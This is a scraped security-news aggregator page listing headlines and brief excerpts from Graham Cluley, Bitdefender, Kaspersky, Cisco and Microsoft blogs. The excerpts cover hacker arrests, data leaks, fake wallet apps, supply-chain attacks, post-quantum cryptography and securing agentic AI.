Meta sees everything, copy fail, and a deepfake gets hired with Graham Cluley and special guest Paul Ducklin.

Sometimes I have to whisper and sometimes the whisper is edited out afterwards, say, "Say who you are."

They had this secret memo where they said, "Look, there's going to be a bit of aggro when we launch this.

So they say there's clear user consent, they say.

And we've got so many people that still don't know about the technology.

1 week, 1 day назад @ grahamcluley.com
Teenager alleged to be Scattered Spider hacker arrested in Finland, faces US extradition
Teenager alleged to be Scattered Spider hacker arrested in Finland, faces US extradition Teenager alleged to be Scattered Spider hacker arrested in Finland, faces US extradition

This is the picture that US prosecutors have painted of a teenager arrested earlier this month at Helsinki Airport while trying to board a flight to Tokyo.

Prosecutors allege that the teenage suspect took part in at least four Scattered Spider attacks , the earliest in March 2023 - just months after his 16th birthday.

The complaint also alleges that the Scattered Spider gang mocked law enforcement, with one 2024 screenshot reportedly showed failed login attempts captioned "F*** off, FBI."

Scattered Spider is a loosely-formed English-speaking collective of teenagers and young adults who became infamous after the 2023 attacks on MGM Resorts and Caesars Entertainment.

You should also consider …

1 week, 4 days назад @ bitdefender.com
Iran-linked Handala hackers leak US Marines data, send chilling WhatsApp threats
Iran-linked Handala hackers leak US Marines data, send chilling WhatsApp threats Iran-linked Handala hackers leak US Marines data, send chilling WhatsApp threats

US Marines stationed around the Persian Gulf have been receiving WhatsApp messages from strangers suggesting they call home and make their final goodbyes.

The messages, which began arriving on Monday, came signed by the Iran-linked Handala hacking group, that has spent much of 2026 attacking US and Israeli targets.

A day later, the Handala hacking crew took to its Telegram channel to announce that it had published the names and phone numbers of 2,379 US Marines stationed in the Persian Gulf.

Handala, which first surfaced in late 2023, presents itself as a pro-Palestinian hacktivist group.

If a Marine receives a WhatsApp message naming them and threatening their family, it does not really ma…

2 weeks, 1 day назад @ bitdefender.com
Smashing Security podcast #465: This developer wanted to cheat at Roblox. It cost millions
Smashing Security podcast #465: This developer wanted to cheat at Roblox. It cost millions Smashing Security podcast #465: This developer wanted to cheat at Roblox. It cost millions

All this and more in episode 465 of the “Smashing Security” podcast with cybersecurity keynote speaker and industry veteran Graham Cluley, joined this week by special guest James Ball.

Smashing Security listeners get $1000 off!

Support the show:You can help the podcast by telling your friends and colleagues about “Smashing Security”, and leaving us a review on Apple Podcasts or Podchaser.

Join Smashing Security PLUS for ad-free episodes and our early-release feed!

Follow us:Follow the show on Bluesky, or join us on the Smashing Security subreddit, or visit our website for more episodes.

2 weeks, 1 day назад @ grahamcluley.com
Alleged Silk Typhoon hacker extradited to the United States to face charges
Alleged Silk Typhoon hacker extradited to the United States to face charges Alleged Silk Typhoon hacker extradited to the United States to face charges

34-year-old Xu Zewei arrived in Houston, Texas at the weekend after Italian authorities approved his extradition to the United States.

The US Department of Justice alleges that Xu was following orders from officers at the Shanghai State Security Bureau, an arm of China's Ministry of State Security.

According to the FBI, Hafnium targeted more than 60,000 organisations in the United States and successfully broke into over 12,700 of them.

The Chinese Foreign Ministry opposed Xu's extradition to the United States, and claimed that cases are being fabricated against Chinese citizens.

But every so often, a suspect makes the mistake of going on holiday somewhere with an extradition agreement with …

2 weeks, 2 days назад @ bitdefender.com
French police arrest 21-year-old “HexDex” hacker over 100 alleged data breaches
French police arrest 21-year-old “HexDex” hacker over 100 alleged data breaches French police arrest 21-year-old “HexDex” hacker over 100 alleged data breaches

A 21-year-old man suspected of conducting approximately 100 data breaches since late 2025 - including a hack of the French Ministry of National Education that exposed records on almost a quarter of a million employees — has been arrested at his home in western France.

According to French prosecutors, the man was reportedly preparing to dump yet another collection of stolen data online at the time of his arrest on 20 April, and has admitted to using the pseudonym "HexDex" online.

The police investigation began on 19 December last year, when the Paris prosecutor's cybercrime unit received around 100 reports of data exfiltration, all apparently linked to the same perpetrator.

In an interview g…

2 weeks, 3 days назад @ bitdefender.com
Smashing Security podcast #464: Rockstar got hacked. The data was junk. The secrets it revealed were not
Smashing Security podcast #464: Rockstar got hacked. The data was junk. The secrets it revealed were not Smashing Security podcast #464: Rockstar got hacked. The data was junk. The secrets it revealed were not

Yeah, yeah.

Yeah, yeah.

As a journalist, this really, really bugs me because of course, it's really difficult when you cover these cybercrime incidents because the victim here, is it P3?

And the company have been clearly really, really terrible in transparency.

Yeah, yeah, yeah.

3 weeks, 1 day назад @ grahamcluley.com
Singer loses life savings to fake wallet downloaded from the Apple App Store
Singer loses life savings to fake wallet downloaded from the Apple App Store Singer loses life savings to fake wallet downloaded from the Apple App Store

Garrett Dutton, better known as G. Love - the front man of blues-hip-hop outfit G. Love & Special Sauce - has learnt that lesson the hard way.

In what must have been a painful admission earlier this month, G. Love described how while setting up a new computer, he downloaded what he believed was the legitimate Ledger Live app from Apple's official App Store.

The bogus app tricked the singer into entering his seed phrase - the master key to his cryptocurrency holdings.

The real Ledger Live app will never ask you for your seed phrase.

In the past Apple has presented its App Store as a more secure and safer place to find and download apps than other operating systems.

4 weeks назад @ bitdefender.com
Sometimes changing the password on your email mailbox isn’t enough
Sometimes changing the password on your email mailbox isn’t enough

Have you ever taken a look at your Microsoft 365 mailbox rules? If not, it might be worth a few minutes of your time. Because newly released research reveals that hackers may already have beaten you to it. Read more in my article on the Fortra blog.

4 weeks, 1 day назад @ fortra.com
Компании 🏢
Блог Касперского Блог Касперского
последний пост 3 days назад
KASG: Шлюз безопасности для автономного транспорта
KASG: Шлюз безопасности для автономного транспорта KASG: Шлюз безопасности для автономного транспорта

Да, за рулем все еще водитель, но он там скорее для страховки, так что появление настоящего беспилотного авто — это лишь вопрос времени.

Для производителя это означает ответственность за поведение автомобиля на дороге и за выбор поставщиков.

Обеспечение безопасности автомобиля в современных условияхДолгое время, когда речь шла о безопасности автомобиля, имелась в виду исключительно функциональная безопасность.

Контроль осуществляется на разных уровнях архитектуры: внутри доменов, на уровне отдельных контроллеров и на границе сетей.

В рамках этой статьи мы рассмотрели лишь часть подходов, которые сегодня применяются в KASG для обеспечения безопасности транспортных средств.

3 days назад @ kaspersky.ru
LLMjacking: атаки на локальные ИИ-серверы — от разведки до защиты
LLMjacking: атаки на локальные ИИ-серверы — от разведки до защиты LLMjacking: атаки на локальные ИИ-серверы — от разведки до защиты

Поэтому при внедрении собственных ИИ-серверов и их вспомогательных систем (RAG, MCP и так далее) необходимо с самого начала внедрять строгие меры безопасности.

В ответ на запросы он отчитывается о доступности серверов Ollama, LM Studio, AutoGPT, LangServe, text-gen-webui, которые часто используются для «обвязки» запущенных локально ИИ-моделей.

Дополнительно сервер-приманка отчитывался о наличии разнообразных баз данных RAG и MCP-сервера с привлекательными возможностями вроде «get_credentials» (получить учетные данные).

На самом деле на Raspberry PI просто были сохранены 500 ответов настоящей модели Qwen3, из которых несложный скрипт выбирал наиболее подходящий с учетом присланного запроса.

1 week назад @ kaspersky.ru
Почти половина паролей в мире взламывается меньше чем за минуту | Блог Касперского
Почти половина паролей в мире взламывается меньше чем за минуту | Блог Касперского Почти половина паролей в мире взламывается меньше чем за минуту | Блог Касперского

Кроме того, взлом паролей ускоряется из года в год: в нашем аналогичном исследовании 2024 года процент паролей, нестойких ко взлому, был ниже.

К сожалению, многие пользователи хранят свои пароли в открытом виде в заметках, сообщениях в мессенджерах, в документах, а также в браузерах, сохраненные пароли из которых злоумышленники вытаскивают за считаные секунды.

Не храните пароли в виде обычного текстаНи в коем случае не записывайте пароли в файлах, сообщениях и документах — они не защищены должным шифрованием, как в менеджере паролей.

Не храните пароли в браузерахМногие пользователи сохраняют свои пароли в браузерах — тем более что те любезно позволяют делать это автоматически.

Важно соблюда…

1 week, 1 day назад @ kaspersky.ru
Как VoidStealer обходит защиту Chrome и ворует сессии и данные | Блог Касперского
Как VoidStealer обходит защиту Chrome и ворует сессии и данные | Блог Касперского Как VoidStealer обходит защиту Chrome и ворует сессии и данные | Блог Касперского

К сожалению, создатели зловредов уже не первый раз находят способы обойти эту защиту, так что секреты, хранящиеся в Chrome, опять под угрозой.

Как работает шифрование с привязкой к приложению в ChromeGoogle представила механизм шифрования с привязкой к приложению (Application-Bound Encryption) в июле 2024 года в 127-й версии браузера Chrome.

Мы уже подробно рассказывали, что представляют собой эти файлы и к чему может привести их кража, поэтому здесь лишь кратко напомним основные факты.

Дело в том, что в данной ОС Chrome использовал только стандартный встроенный механизм защиты данных Data Protection API (DPAPI).

В теории это должно было заметно усложнить атаки на Chrome и снизить эффективн…

1 week, 2 days назад @ kaspersky.ru
Атака на цепочку поставок через DAEMON Tools | Блог Касперского
Атака на цепочку поставок через DAEMON Tools | Блог Касперского Атака на цепочку поставок через DAEMON Tools | Блог Касперского

Наши эксперты обнаружили масштабную атаку на цепочку поставок через ПО для эмуляции оптического дисковода DAEMON Tools.

Кого именно атакуютС начала апреля было зарегистрировано несколько тысяч попыток установки дополнительной вредоносной нагрузки через зараженное ПО DAEMON Tools.

Что именно было зараженоВредоносный код был обнаружен в DAEMON Tools начиная с версии 12.5.0.2421 и до 12.5.0.2434.

Если у вас на компьютере (или где-то в организации) используется ПО DAEMON Tools, наши эксперты рекомендуют тщательно проверить устройства на наличие аномальной активности начиная с 8 апреля.

Наши решения успешно защищают пользователей от всего вредоносного ПО, используемого в атаке на цепочку поставо…

1 week, 3 days назад @ kaspersky.ru
Мотивация дроидов из «Звездных войн» | Блог Касперского
Мотивация дроидов из «Звездных войн» | Блог Касперского Мотивация дроидов из «Звездных войн» | Блог Касперского

Практически в каждом фильме или сериале из вселенной «Звездных войн» присутствуют дроиды.

Кто-то, наверное, скажет: «Да какая разница?» И с точки зрения нормального зрителя будет абсолютно прав.

Дроид — сложная киберфизическая система, повлияв на мотивацию которой атакующий может получить доступ к конфиденциальным данным, а то и вовсе причинить вред настоящему владельцу.

В нескольких случаях человек, не являющийся формальным владельцем дроида, старается повлиять на его поступки, пытаясь ввести дроида в заблуждение.

Ферн вводит в дискуссию понятие из детских игр — unclaimsies (то есть как бы обнуление прав) и заявляет собственные права на место капитана.

1 week, 4 days назад @ kaspersky.ru
Эволюция Kaspersky SIEM (KUMA) | Блог Касперского
Эволюция Kaspersky SIEM (KUMA) | Блог Касперского Эволюция Kaspersky SIEM (KUMA) | Блог Касперского

Динамически обновляемый контентКорреляционный контент сегодня — это не статичный набор правил, а процесс: он постоянно развивается и адаптируется под актуальные угрозы.

Только за 2025 год мы выпустили 55 обновлений пакетов правил для разных версий и разных языков нашей SIEM-системы KUMA.

Всего за год добавилось 10 новых пакетов, а также 250 правил обнаружения и множество улучшений существующего контента.

Эффективность работы KUMA повышается за счет интеграции с Kaspersky EDR и отдельными наборами правил для Active Directory, в которых реализованы десятки сценариев обнаружения атак на разных стадиях.

В целом SIEM перестает быть набором правил и превращается в постоянно обновляемую систему об…

2 weeks, 1 day назад @ kaspersky.ru
Инструменты слежки через автомобиль | Блог Касперского
Инструменты слежки через автомобиль | Блог Касперского Инструменты слежки через автомобиль | Блог Касперского

В случае если авто или его владелец потенциально связаны с преступлением, автомобиль могут изучать не только под микроскопом и ультрафиолетом.

Комплексная слежкаДля слежки за «лицами, представляющими интерес», данные, полученные с самого автомобиля, связывают с информацией из других источников.

Журналисты обнаружили, что некоторые компании рекламируют возможность дистанционного скрытного включения микрофонов и камер автомобиля, что позволяет прослушивать разговоры в реальном времени.

Если это приложение вам очень нужно, откажитесь от передачи своих данных «на сторону» в настройках фирменного приложения.

Откажитесь от передачи данных и в настройках самого автомобиля, если это возможно.

2 weeks, 2 days назад @ kaspersky.ru
Практическое руководство по безопасному вайб-кодингу для SMB
Практическое руководство по безопасному вайб-кодингу для SMB Практическое руководство по безопасному вайб-кодингу для SMB

Например, приложение, которое обрабатывает конфиденциальные данные организации, опубликовано на публичном конструкторе вайб-код-приложений (Lovable и ему подобным) и по умолчанию доступно всему Интернету.

Нельзя один раз проделать упражнение «защита приложения» и на этом остановиться.

Всегда просите ИИ добавлять проверки для любых данных, которые вводят люди (как в формы, так и в строки поиска).

Тестируйте новые функции и новые версии приложения в безопасной среде — на копии сайта или приложения и на копии базы данных.

С помощью сканера вы проследите, чтобы файлы с ключами и паролями не попадали в Git и не публиковались вместе с проектом.

2 weeks, 3 days назад @ kaspersky.ru
Фишинговые подделки под криптокошельки в App Store и другие атаки на владельцев крипты для iOS и macOS | Блог Касперского
Фишинговые подделки под криптокошельки в App Store и другие атаки на владельцев крипты для iOS и macOS | Блог Касперского Фишинговые подделки под криптокошельки в App Store и другие атаки на владельцев крипты для iOS и macOS | Блог Касперского

Преступники внедряют уже известные трюки в новые цепочки атак, в том числе ловят жертв в App Store.

Подделки под криптокошелькиВ марте этого года мы обнаружили в топе китайского App Store фишинговые приложения, иконки и названия которых мимикрируют под приложения для управления распространенными криптокошельками.

Чтобы приложения были пропущены в App Store, в них добавляли какую-либо базовую функциональность, например игру, калькулятор или планировщик задач.

Установка без App StoreКлючевой частью схемы является установка вредоносов на iPhone жертв в обход App Store и его процесса верификации.

Такие приложения не требуют публикации в App Store, и их можно устанавливать без ограничений по кол…

2 weeks, 4 days назад @ kaspersky.ru
Подборка фантастики от экспертов «Лаборатории Касперского»
Подборка фантастики от экспертов «Лаборатории Касперского» Подборка фантастики от экспертов «Лаборатории Касперского»

Возможно, именно это в какой-то мере сформировало их отношение к информации и сподвигло заняться ее защитой.

То есть, по сути, описана виртуальная реальность, неотличимая от настоящей (и это за 35 лет до «Матрицы»).

«Нейромант» (1984)«Нейромант» — книга, опубликованная в 1984 году и, по сути, положившая начало популярности жанра «киберпанк» (хотя само слово было изобретено немного раньше).

И эту идею отложили в долгий ящик, и она до сих пор так и не реализовалась.

Это уже не фантастика, и в этой подборке он стоит скорее для контраста.

3 weeks назад @ kaspersky.ru
Спам и фишинг, направленный на налогоплательщиков | Блог Касперского
Спам и фишинг, направленный на налогоплательщиков | Блог Касперского Спам и фишинг, направленный на налогоплательщиков | Блог Касперского

Такие документы — лакомый кусочек для злоумышленников, ведь в них хранятся личные данные, информация о работе, доходах, собственности и банковских счетах — и далее по списку.

Неудивительно, что именно в это время мошенники становятся особенно активными: Интернет сейчас буквально кишит поддельными сайтами, имитирующими государственные ресурсы и налоговые органы.

В этом посте рассказываем, как действуют поддельные сайты от «налоговых органов» в разных странах и чего делать точно не стоит, чтобы сохранить свои деньги и конфиденциальную информацию.

На подобных сайтах-подделках мошенники крадут учетные данные от легитимных сайтов и личную информацию, а затем предлагают оформить налоговый вычет и…

3 weeks, 1 day назад @ kaspersky.ru
Подслушивание через оптоволоконный кабель | Блог Касперского
Подслушивание через оптоволоконный кабель | Блог Касперского Подслушивание через оптоволоконный кабель | Блог Касперского

«Оптика» уже давно является стандартным средством передачи данных благодаря возможности транслировать информацию с высокой скоростью и на большие расстояния.

Потенциально это позволяет превратить оптоволоконный кабель в микрофон и перехватывать разговоры в помещении, находясь в километрах от источника звука.

Конечно, данная работа имеет скорее теоретический характер, как и другие подобные исследования, о которых мы писали ранее (прослушивание через датчик мыши, модули оперативной памяти как радиопередатчик, похищение данных с сенсора камеры видеонаблюдения, подглядывание в экран через кабель HDMI).

Трудности оптического подслушиванияВпервые о таких особенностях оптического кабеля задумались…

3 weeks, 2 days назад @ kaspersky.ru
Атаки на разработчиков | Блог Касперского
Атаки на разработчиков | Блог Касперского Атаки на разработчиков | Блог Касперского

Если компания производит программное обеспечение, то злоумышленники получат возможность организовать масштабную атаку на цепочку поставок для атаки на пользователей разрабатываемого приложения.

Варианты атак на разработчиков ПОВыбрав целью разработчика программного обеспечения, злоумышленники, как правило, пытаются теми или иными способами подсунуть ему вредоносный код.

Вредоносный код в тестовых заданияхПериодически злоумышленники публикуют привлекательные вакансии для разработчиков и снабжают их тестовыми заданиями, в которых содержится вредоносный код.

Атака была направлена на разработчиков, которые пытаются найти способ использовать ассистентов без ведома ИБ-службы компании.

Узкоспециал…

3 weeks, 3 days назад @ kaspersky.ru
Хакеры используют утекшие инструменты спецслужб для атак на рядовых пользователей iOS | Блог Касперского
Хакеры используют утекшие инструменты спецслужб для атак на рядовых пользователей iOS | Блог Касперского Хакеры используют утекшие инструменты спецслужб для атак на рядовых пользователей iOS | Блог Касперского

DarkSword и Coruna — два новых инструмента для бесконтактных и незаметных атак на iOS-устройства, которые уже активно используются злоумышленниками «в дикой природе».

Однако DarkSword и Coruna, обнаруженные исследователями кибербезопасности в этом году, меняют правила игры: эти зловреды уже используются для массового заражения рядовых пользователей.

Получается зловред двойного назначения, который может использоваться как для шпионажа, так и для кражи криптовалюты.

Последняя версия Coruna, как и DarkSword, имеет модификации для кражи криптовалюты, а также ворует фотографии и в некоторых случаях электронную почту.

Кто создал Coruna и DarkSword и как они попали в «дикую природу»Исследование ко…

4 weeks назад @ kaspersky.ru
Блог Group-IB
последний пост None
Cisco Security Blog Cisco Security Blog
последний пост 1 day, 8 hours назад
Inside the SOC: AI-powered DNS defense against ransomware
Inside the SOC: AI-powered DNS defense against ransomware Inside the SOC: AI-powered DNS defense against ransomware

Today we’re releasing our new AI-powered DNS defense platform, available within Cisco Secure Access and powered by Cisco Talos intelligence.

How Cisco disrupts the ransomware lifecycle (DNS focus)Cisco Talos DNS Security (fully integrated into Cisco Secure Access) detects obfuscated data hidden in DNS packets, the core of internet communication.

Through Talos DNS Security, Talos’ custom built machine learning models detect the unique “lexical texture” of algorithmically generated domains (DGA) used by attackers.

Through Talos DNS Security, Talos’ custom built machine learning models detect the unique “lexical texture” of algorithmically generated domains (DGA) used by attackers.

Learn more …

1 day, 8 hours назад @ blogs.cisco.com
State-sponsored actors, better known as the friends you don’t want
State-sponsored actors, better known as the friends you don’t want State-sponsored actors, better known as the friends you don’t want

This is also why zero trust architecture matters, shifting from assumed trust to continuous verification with systems built to withstand failure.

Being ready for the long gamePreparing for state-sponsored threats means closing gaps before an incident, not during one.

Behavioural baseline : Continuously updated behavioral baselines help surface low and slow activity, especially credential abuse that leaves no malware trace.

OT and ICS readiness : OT environments need hardware-enforced separation, as well as established response procedures.

Supply chain and insider threats: supply chains need mapped vendor access and SBOMs, and insider risk demands cross-functional hiring verification and pre…

2 days, 5 hours назад @ blogs.cisco.com
Security Insights: A Threat-First View for the Platform That Enforces Access
Security Insights: A Threat-First View for the Platform That Enforces Access Security Insights: A Threat-First View for the Platform That Enforces Access

The Missing Surface: Security ContextAsk a SOC analyst what they need from a security platform and you get consistent answers.

Cisco Secure Access now includes Security Insights: a security analytics dashboard that surfaces where risk is concentrated, helps teams identify emerging threats and policy gaps, and gives security leadership the trend data to report on posture and measure the impact of initiatives over time.

Secure Access addresses this through the AI view, which tracks GenAI application usage and guardrail violations alongside the rest of security operations.

Security Insights gives analysts the signals to start an investigation, security managers the view to close policy gaps, a…

2 weeks, 1 day назад @ blogs.cisco.com
From Strategy to Architecture: How Cisco is Building a Quantum-Safe Future
From Strategy to Architecture: How Cisco is Building a Quantum-Safe Future From Strategy to Architecture: How Cisco is Building a Quantum-Safe Future

The integrity of the systems we depend on, the trust layer underneath everything, is equally exposed.

This integrates naturally with external key management systems, including Quantum Key Distribution platforms for the most sensitive environments.

In the meantime, visit the Cisco Trust Center to learn more about our PQC approach and stay ahead of what’s coming.

Ask a question and stay connected with Cisco Security on social media.

Cisco Security Social MediaLinkedInFacebookInstagram

2 weeks, 1 day назад @ blogs.cisco.com
AI-Ready, Simpler, and More Secure WAN: Cisco SD-WAN Innovations
AI-Ready, Simpler, and More Secure WAN: Cisco SD-WAN Innovations AI-Ready, Simpler, and More Secure WAN: Cisco SD-WAN Innovations

Cisco Catalyst SD-WAN for Government integration with Cisco Secure Access FedRAMP instances: Government agencies require secure, compliant networking solutions that meet stringent federal security standards.

Cisco Catalyst SD-WAN for Government now integrates with Cisco Secure Access FedRAMP instances, enabling government organizations to maintain secure connectivity while ensuring compliance with federal security standards.

Policy groups in Cisco Catalyst SD-WAN Manager enable agencies to define IPSec tunnels and connection parameters to Secure Access instances, ensuring secure and compliant access across their network infrastructure.

AI application classification and shadow AI control: Ci…

2 weeks, 3 days назад @ blogs.cisco.com
Designing for What’s Next: Securing AI-Scale Infrastructure Without Compromise
Designing for What’s Next: Securing AI-Scale Infrastructure Without Compromise Designing for What’s Next: Securing AI-Scale Infrastructure Without Compromise

With modular N+1 clustering (supporting up to 16 nodes), the 6100 Series scales to up to 8 Tbps of L7 throughput.

Using our AI-driven Encrypted Visibility Engine (EVE), the 6100 Series identifies threats in encrypted traffic without decryption, preserving privacy and line-rate speed.

Because at this scale, security shouldn’t hold you back—it should help you move faster.

Ask a question and stay connected with Cisco Security on social media.

Cisco Security Social MediaLinkedInFacebookInstagram

1 month назад @ blogs.cisco.com
Preparing for Post-Quantum Cryptography: The Secure Firewall Roadmap
Preparing for Post-Quantum Cryptography: The Secure Firewall Roadmap Preparing for Post-Quantum Cryptography: The Secure Firewall Roadmap

Cisco Secure Firewall uses encryption for many things: VPN tunnels, remote management, hardware-level trust, and inline decryption.

They also define stronger baselines of security for existing algorithms, which are already incorporated into Cisco Secure Firewall.

Support arrives in Secure Firewall Threat Defense (FTD) 10.5 and ASA 9.25, targeted for General Availability in late 2026.

PQC support for TLS client features is planned for ASA/FTD 11.0, while management web server PQC support depends on underlying web server library readiness.

Cisco Secure Firewall is building post-quantum cryptography into every layer of the platform, so that when your organization is ready to make the transitio…

1 month назад @ blogs.cisco.com
Mobile World Congress 2026: AI-powered Network Security
Mobile World Congress 2026: AI-powered Network Security Mobile World Congress 2026: AI-powered Network Security

At this year’s Mobile World Congress in Barcelona, service providers showed up from around the world to join over 115,000 attendees from 210 countries.

We leveraged the lessons learned from previous SOC deployments, adding the new Secure Firewall 6160, which is designed specifically for AI-ready data centers.

Clockwise from the upper left quadrant: Firepower in Security Cloud Control, Splunk Cloud dashboard for MWC, Splunk Enterprise Security Mission Control and Cisco XDR.

Ask a question and stay connected with Cisco Security on social media.

Cisco Security Social MediaLinkedInFacebookInstagram

1 month назад @ blogs.cisco.com
Powering MWC Barcelona – Building a Unified SOC and NOC with Splunk in Record Time
Powering MWC Barcelona – Building a Unified SOC and NOC with Splunk in Record Time Powering MWC Barcelona – Building a Unified SOC and NOC with Splunk in Record Time

Mobile World Congress (MWC) Barcelona is one of the most demanding environments for network and security operations.

For the 2nd year, the Cisco team leveraged Splunk, in addition to its other security products, to deliver a unified Security Operations Center (SOC) and Network Operations Center (NOC) experience.

Clockwise from the upper left quadrant: Firepower in Security Cloud Control, Splunk Cloud dashboard for MWC, Splunk Enterprise Security Mission Control and Cisco XDR.

Bridging SOC and NOC: From Visibility to ContextTraditionally, SOC and NOC teams operate in parallel, often using separate tools and datasets.

Edge engineering still matters in cloud-first architecturesComponents like …

1 month назад @ blogs.cisco.com
Inside the Mobile World Congress 2026 SOC: Detecting Shadow Traffic with Firepower 6100
Inside the Mobile World Congress 2026 SOC: Detecting Shadow Traffic with Firepower 6100 Inside the Mobile World Congress 2026 SOC: Detecting Shadow Traffic with Firepower 6100

Among the new security features, the one I was most eager to explore was Shadow Traffic detection.

Observing Shadow Traffic at scale on the live congress wireless network provided useful insight.

The Shadow Traffic dashboard put Tailscale VPN, ExpressVPN, and NordVPN at the top of the list.

Shadow Traffic detection conveniently labels the suspicious connections, making filtering in the Unified Events Viewer straightforward and precise.

With Shadow Traffic detection, you expand visibility into inspection gaps that most organizations don’t even realize they have.

1 month назад @ blogs.cisco.com
AI-powered Network Security at the Mobile World Congress 2026 SNOC
AI-powered Network Security at the Mobile World Congress 2026 SNOC AI-powered Network Security at the Mobile World Congress 2026 SNOC

Please note that the network of the venue remains protected at the DNS level by Cisco Secure Access outside the event.

Access to these AI models can be managed with Secure Access to secure AI apart from just leveraging AI for security.

During the event, Secure Access blocked access to one of those phishing domains.

Secure Access Investigate, as appearing above, provides real-time actionable threat intelligence by analysing global data from the Secure Access network using AI to detect, score, and predict emerging threats.

ConcludingThe AI-powered Security and Network Operations Center (S/NOC) at Mobile World Congress 2026 demonstrated Cisco’s commitment to leveraging cutting-edge technologie…

1 month назад @ blogs.cisco.com
Data Optimization in Security: A Splunk Architect’s Perspective
Data Optimization in Security: A Splunk Architect’s Perspective Data Optimization in Security: A Splunk Architect’s Perspective

Data optimization in security is often discussed as a cost control mechanism.

In a Splunk security stack, data optimization is not about reducing volume.

Advanced Optimization Blind Spots in Splunk Security EnvironmentsData Model Acceleration Blindness: Aggressive filtering often breaks Common Information Model (CIM) compliance or data model population.

Security data optimization must include: Search workload modeling; concurrent triage simulation; adversary emulation exercises.

Final Thought and Call to ActionIn Splunk security architectures, data optimization is not a storage tuning exercise, finance initiative, or infrastructure refresh it is a security engineering discipline.

1 month, 1 week назад @ blogs.cisco.com
Inside the Talos 2025 Year in Review: A discussion on what the data means for defenders
Inside the Talos 2025 Year in Review: A discussion on what the data means for defenders Inside the Talos 2025 Year in Review: A discussion on what the data means for defenders

Every year, the Cisco Talos Year in Review captures the patterns shaping the threat landscape.

To unpack the biggest takeaways and what they mean for security teams, we brought together Christopher Marshall, VP of Cisco Talos, and Peter Bailey, SVP and GM of Cisco Security.

For the full discussion, head over to the Cisco Talos blog where you can also download the Year in Review report.

Old vulnerabilities, new speedMarshall: One of the clearest trends in this year’s data is the contrast in how vulnerabilities are being exploited.

Read full post on the Cisco Talos blogWe’d love to hear what you think!

1 month, 1 week назад @ blogs.cisco.com
The Agent Trust gap: What Our Research Reveals About Agentic AI Security
The Agent Trust gap:  What Our Research Reveals About Agentic AI Security The Agent Trust gap: What Our Research Reveals About Agentic AI Security

Our research shows that nearly 60% of security leaders view security concerns as the primary barrier to broader agentic AI adoption.

At the exact same time, 29% rank securing agentic AI among their top three priorities for the coming year.

Much like a public-facing web service, an external AI agent can be attacked, exploited, or “poisoned” by malicious inputs.

The “Who Owns This?” ProblemAs agentic AI expands into operational systems, who is actually responsible for securing it?

Explore our Agentic AI Security Solution to learn more, or view the full survey results infographic.

1 month, 3 weeks назад @ blogs.cisco.com
Zero Trust for Agentic AI: Safeguarding your Digital Workforce
Zero Trust for Agentic AI: Safeguarding your Digital Workforce Zero Trust for Agentic AI: Safeguarding your Digital Workforce

Welcome to the Agentic AI EraEnterprise interest in agentic AI is accelerating.

AI agents operate at machine speeds to execute complex tasks, yet they completely lack essential human judgment and contextual awareness.

Current challenges in the agentic AI ecosystemWhen our teams were analyzing the problem around governing this new digital AI workforce, we saw three areas across our customer and prospect conversations on why zero trust access built for humans must adapt to agentic workflows:Early and fragmented ecosystem.

Zero trust for agentic AI in practiceLet’s look at a typical scenario — a financial automation agent kicking off vendor payments.

We are thrilled to partner with AI-driven o…

1 month, 3 weeks назад @ blogs.cisco.com
Microsoft Security Microsoft Security
последний пост 1 day, 4 hours назад
Defense in depth for autonomous AI agents
Defense in depth for autonomous AI agents Defense in depth for autonomous AI agents

Designing Secure Autonomous AI Agents with Defense in DepthAI agents are moving beyond assistance and into action.

Security for agentic AI relies on defense in depth.

Pattern 1: Design agents like microservicesThe most consequential application layer decision is action scope: how broadly you define an agent’s responsibilities.

To implement Pattern 1: Agents as Microservices and Pattern 2: Least permissions, agents must never have the same identity as the user.

As organizations deploy more agentic AI systems, the question is not whether agents will make mistakes.

1 day, 4 hours назад @ microsoft.com
Kazuar: Anatomy of a nation-state botnet
Kazuar: Anatomy of a nation-state botnet Kazuar: Anatomy of a nation-state botnet

By separating responsibilities across Kernel, Bridge, and Worker modules and restricting external communications to a single elected leader, Kazuar reduces its observable footprint.

Type: KernelThe Kernel module serves as the central coordinator for the botnet.

Leadership electionOne of the methods that Kazuar uses to limit external communication is to use a single Kernel leader per botnet.

Botnet operationsWith the botnet setup complete, configurations instantiated, and a leader elected, Kazuar transitions into its steady state operational phase.

The Kernel module task handler has a few additional functions that handle commands issued from the leader Kernel module.

1 day, 5 hours назад @ microsoft.com
When configuration becomes a vulnerability: Exploitable misconfigurations in AI apps
When configuration becomes a vulnerability: Exploitable misconfigurations in AI apps When configuration becomes a vulnerability: Exploitable misconfigurations in AI apps

In this blog, we look at examples of exploitable misconfigurations we’ve observed in some of the popular AI applications and platforms.

Defender for Cloud signals indicate that more than half of cloud-native workload exploitations, including AI applications, stem from misconfigurations.

Exploitable misconfigurations in popular AI applicationsIn the following sections, we discuss examples of exploitable misconfigurations found in popular applications and platforms across the AI and agentic ecosystem.

Learn moreFor the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog.

To hear stories and insights from the Microsoft Thr…

1 day, 6 hours назад @ microsoft.com
Accelerating detection engineering using AI-assisted synthetic attack logs generation
Accelerating detection engineering using AI-assisted synthetic attack logs generation Accelerating detection engineering using AI-assisted synthetic attack logs generation

Yet, despite their importance, high‑quality security attack logs are notoriously difficult to collect, especially at scale.

In this post, we explore a different path: using AI to generate realistic, high‑fidelity synthetic security attack logs.

This blog examines whether AI-assisted synthetic log generation can provide similar fidelity, without the operational overhead of lab‑based attack execution.

We limited the evaluation of synthetic attack logs to malicious activity during the attack windows.

Overall, agentic collaboration emerges as the most effective technique for high‑quality synthetic attack logs generation.

2 days, 21 hours назад @ microsoft.com
Defense at AI speed: Microsoft’s new multi-model agentic security system finds 16 new vulnerabilities
Defense at AI speed: Microsoft’s new multi-model agentic security system finds 16 new vulnerabilities Defense at AI speed: Microsoft’s new multi-model agentic security system finds 16 new vulnerabilities

They used the new Microsoft Security multi-model agentic scanning harness (codename MDASH) which was built by Microsoft’s Autonomous Code Security team.

Codename MDASH is being used by Microsoft security engineering teams and tested by a small set of customers as part of a limited private preview.

Codename: MDASH—Microsoft Security’s new multi-model agentic scanning harnessCodename MDASH is, at its core, an agentic vulnerability discovery and remediation system.

The findings in this Patch Tuesday and the retrospective recall on five years of CLFS MSRC cases are evidence that AI vulnerability findings can scale.

ConclusionThe Microsoft Security multi-model agentic scanning harness (codename …

2 days, 22 hours назад @ microsoft.com
Defending consumer web properties against modern DDoS attacks
Defending consumer web properties against modern DDoS attacks Defending consumer web properties against modern DDoS attacks

